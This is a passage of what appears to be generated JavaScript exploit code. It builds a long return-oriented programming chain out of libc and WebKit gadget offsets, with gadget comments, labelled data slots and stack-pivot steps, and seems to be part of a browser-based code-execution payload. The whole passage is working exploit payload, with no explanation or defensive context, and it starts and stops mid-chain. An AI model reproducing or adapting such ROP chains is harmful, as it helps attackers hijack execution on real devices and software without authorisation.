libc_base+764760, //pop rsi ropchain+84160, //L456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84144, //L454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L454: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L456: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+84304, //L459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84272, //L457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+84288, //L458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L457: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L458: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L459: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+84376, //L461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L461: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+84432, //L462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L462: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+84512, //L464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L464: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L466: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+84632, //L469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84616, //L467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L467: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L469: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+84808, //L472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+84824, //L473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+84776, //L470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+84792, //L471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L470: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L471: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L472: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L473: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+84936, //L474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+84968, //L476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+84952, //L475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L474: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L476: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+85056, //L478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L478: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+85112, //L479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L479: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+85184, //L482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L482: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+85240, //L483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L483: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L485: libc_base+764760, //pop rsi ropchain+85328, //L486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L486: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L488: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+85448, //L491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+85432, //L489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L489: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L491: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+85624, //L494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+85640, //L495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+85592, //L492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+85608, //L493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L492: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L493: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L494: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L495: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+85736, //L497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+85720, //L496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L496: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L497: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+85824, //L499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L498: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L499: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+85880, //L500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L500: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L502: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+85960, //L504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L504: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+74104, //L202 //L235: libc_base+764760, //pop rsi ropchain+86056, //L505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L505: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L507: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+86176, //L510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+86160, //L508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L508: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L510: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+86288, //L511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86320, //L513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+86304, //L512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L511: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L512: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L513: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86424, //L514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86440, //L515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L514: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L515: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86560, //L516 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86544, //L517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L517: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L516: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+86648, //L519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+86632, //L518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L518: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L519: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86752, //L520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86768, //L521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L520: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L521: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86888, //L522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+86872, //L523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L523: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L522: db([0, 0]); // 0x0 //_create_extcall: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+86960, //L525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L525: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87024, //L527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L527: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L528: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L530: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+87192, //L533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87176, //L531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L531: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L533: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+87280, //L534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+87296, //L536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L534: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L536: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L537: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L539: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+87456, //L542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87440, //L540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L540: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L542: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+87600, //L545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+87568, //L543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+87584, //L544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L543: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L544: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L545: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+87672, //L547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L547: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+87728, //L548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L548: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+87824, //L551 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L550: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L551: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L552: db([1, 0]); // 0x1 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+87920, //L553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+87936, //L554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L553: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L554: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+88024, //L556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L556: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+88080, //L557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L557: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+88184, //L559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L559: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L561: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+88304, //L564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+88288, //L562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L562: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L564: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+88448, //L567 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+88416, //L565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+88432, //L566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L565: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L566: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L567: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+88520, //L569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L569: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+88576, //L570 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L570: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+88672, //L573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L572: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L573: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L574: db([0, 0]); // 0x0 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+88768, //L575 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+88784, //L576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L575: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L576: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+88872, //L578 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L578: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+88928, //L579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L579: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+89000, //L582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L582: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+89056, //L583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L583: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L585: pivot_addr, libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+89192, //L586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L588: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+89312, //L591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+89296, //L589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L589: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L591: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+89456, //L594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+89424, //L592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+89440, //L593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L592: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L594: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+89528, //L596 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L596: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+89584, //L597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L597: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+89680, //L600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L599: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L600: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L601: db([1, 0]); // 0x1 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+89776, //L602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+89792, //L603 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L602: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L603: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+89880, //L605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L605: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+89936, //L606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L606: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+90008, //L609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L609: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+90064, //L610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L610: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+90152, //L612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L612: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L614: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+90272, //L617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+90256, //L615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L615: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L617: db([0, 0]); // 0x0 